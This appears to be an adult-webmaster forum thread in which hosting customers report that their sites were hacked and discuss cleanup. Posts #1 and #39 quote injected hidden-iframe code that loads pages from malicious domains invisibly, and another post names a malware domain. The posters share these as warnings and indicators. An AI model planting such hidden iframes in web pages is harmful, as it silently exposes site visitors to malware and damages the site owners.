![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Anyone else had their Webair sites hacked yesterday?
Fucking Iframe code added to the sites by this fucking asshole.
<iframe src="http://ruoo.info" width=1 height=1 style="visibility ![]() ![]() You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers. ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Just a head's up, check your sites. I've informed their registrar.
Had to submit 6 review requests to google as the sites have been royally fucked over. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Industry Role:
Join Date: Mar 2007
Location: Arizona
Posts: 8,437
|
Wow, thanks for the heads up. I recieved an email from them saying that they had to move my server due to a "PDU error", didn't think to check my sites though. Going to scan through them now.
__________________
Conversion Sharks - 1,000+ adult dating offers, traffic management, and consistently high payouts. We will guarantee and beat your current EPC to win your dating traffic! Skype: ConversionSharks || Email: info /@/ conversionsharks.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
Confirmed User
Join Date: Apr 2005
Location: Lazyness is a lifestyle
Posts: 3,201
|
Might also have to do with you and not the host.
Did you check your logs or talked to your host?
__________________
![]() A girl once told me "Give me 8 inches and make it HURT". So, I fucked her twice and hit her with a brick. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
Confirmed User
Industry Role:
Join Date: Mar 2007
Location: Arizona
Posts: 8,437
|
No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.
http://tools.pingdom.com/fpt
__________________
Conversion Sharks - 1,000+ adult dating offers, traffic management, and consistently high payouts. We will guarantee and beat your current EPC to win your dating traffic! Skype: ConversionSharks || Email: info /@/ conversionsharks.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 |
Confirmed User
Join Date: Jul 2003
Location: London UK
Posts: 3,029
|
thanks for the heads up. checking now
__________________
ARE YOU A FAMILY MEMBER? CLICK HERE TO FIND OUT! |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 |
Confirmed User
Industry Role:
Join Date: Nov 2005
Posts: 8,170
|
Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..
I have another server at www.phatservers.com and not had that issue with them. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
♥♥♥ Likes Hugs ♥♥♥
Industry Role:
Join Date: Nov 2001
Location: /home
Posts: 15,841
|
Why do people still use webair? They're like the new dreamhost.
__________________
I like pie. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 | |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Quote:
Yeah, I hear you Babaganoosh. I've just got so many domains, and it's a pain in the ass to source a load of new hosts that accept the kind of sites we make ![]() ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 | |
Confirmed User
Industry Role:
Join Date: Nov 2001
Location: NYC
Posts: 3,927
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Heard nothing back from webair in 8 hours.
Great support. Not. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Those were straight html pages.
It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 |
Too lazy to set a custom title
Industry Role:
Join Date: Jul 2001
Posts: 59,204
|
I never seen a host getting so much complaints on here as Webair. Yet people always use them. Dont cry about shit if host with Webair. You can expect shit.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 | |
Confirmed User
Join Date: Oct 2003
Location: localhost
Posts: 699
|
Quote:
__________________
------------------------------- Oliver Smith "Drunk Russian Hackers are Invincible" ASCII P0rn rules aim: olvrsmt icq: 21018030 |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 | |
Confirmed User
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
|
Quote:
![]()
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
This is the first problem I've had with Webair in 6 years, so you're talking shit as usual Troll boy. I thought you'd been banned permanently once and for all Frank?
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#19 |
emperor of my world
Join Date: Aug 2004
Location: nethalands
Posts: 29,903
|
webair is one of te few hosts i avoid like the plague, about 1 thread a week about them.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 | |
Confirmed User
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
|
Quote:
Seriously dude. Webmaster 101. You should know this shit already. Specially if you have your own dedi box.
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 |
Confirmed User
Industry Role:
Join Date: Aug 2006
Posts: 5,594
|
Thanks for the info potter, but they are basic sites, just html, handwritten, nothing running on them. No scripts to exploit.
I'm not a server guy. I write sites, and expect whoever hosts them to fucking do their job and look after them. I don't expect to have to look after server security as well as know how to SEO a site to beat 40 million others to a #1 keyphrase. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 |
Confirmed User
Join Date: Jan 2006
Location: England
Posts: 1,405
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 |
Affiliate
Join Date: Jul 2004
Posts: 28,735
|
hmm... somebody complained about a site I posted last night! Gonna double check now!
__________________
M&A Queen |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#24 |
Too lazy to set a custom title
Industry Role:
Join Date: Jul 2001
Posts: 59,204
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#25 |
Confirmed User
Join Date: Jan 2005
Location: Chicago, IL
Posts: 8,452
|
Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#26 |
Too lazy to set a custom title
Join Date: Dec 2004
Posts: 17,513
|
lollllllllllllllll
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#27 |
Hmm
Industry Role:
Join Date: Sep 2005
Location: On an endless road around the world for rock and roll.
Posts: 12,642
|
Nope, mine box was fine and it is fine now too
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#28 |
Yes that IS me. Bitch.
Industry Role:
Join Date: Nov 2001
Posts: 14,149
|
You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#29 | |
Richest man in Babylon
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,689
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#30 |
Confirmed User
Join Date: Jan 2005
Location: Chicago, IL
Posts: 8,452
|
Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#31 |
Two fresh affiliate progs
Industry Role:
Join Date: Nov 2004
Location: Inside teen pussy
Posts: 29,602
|
I am not with webair but had mine hacked yes. iframe but different code.
__________________
[email protected] Skype: 17026955414 Vacares Web Hosting - Protect Your Ass with Included Daily Backups |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#32 |
So Fucking Banned
Join Date: Jul 2004
Posts: 3,644
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#33 |
Confirmed User
Join Date: Aug 2007
Posts: 5,687
|
I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?
__________________
No doubt one may quote history to support any cause, as the devil quotes scripture. -- Learned Hand http://www.bjpenn.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#34 |
Confirmed User
Join Date: Aug 2007
Posts: 2,985
|
Can either be a simple redirect or a trojan installer.
__________________
jim (at) amateursconvert . com Amateurs Convert
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#35 | |
Anti Communist
Industry Role:
Join Date: Nov 2003
Location: Null
Posts: 29,851
|
Quote:
Duke
__________________
My mother said, to get things done You'd better not mess with Major Tom |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#36 |
Confirmed User
Join Date: Aug 2007
Posts: 5,687
|
this is the first part of the pop you get from the virus that has infected webair servers.
ijabwif.com/cgi-bin some boxes with norton catch the virus and some dont. Webair is being VERY quiet about this for some reason.
__________________
No doubt one may quote history to support any cause, as the devil quotes scripture. -- Learned Hand http://www.bjpenn.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#37 |
Available for Coding Work
Industry Role:
Join Date: Jun 2008
Posts: 1,432
|
All of my sites have been infected with a piece of js code on all the index files. The sites are on four different hosting accounts, the FTP passwords are not the same.
Yeah, basically i'm fubar. I'm expecting Google to take notice and ban the sites, and if that happens, well... I don't quite understand how they got in on four different hosting accounts. Judging by the FTP logs, it seems it was some sort of script that inserted this code, because all files on all hosting accounts have been changed at the same exact time. 9.05.2009 - 12:24. The hosts cleaned the sites, but a few days later, i've been hit again. It seems it is something on my PC that is causing this. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#38 |
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,397
|
Your PC? Highly unlikely...
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#39 | ||
Available for Coding Work
Industry Role:
Join Date: Jun 2008
Posts: 1,432
|
This is the first code that was injected on my sites: (decoded version)
Code:
<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Quote:
Quote:
|
||
![]() |
![]() ![]() ![]() ![]() ![]() |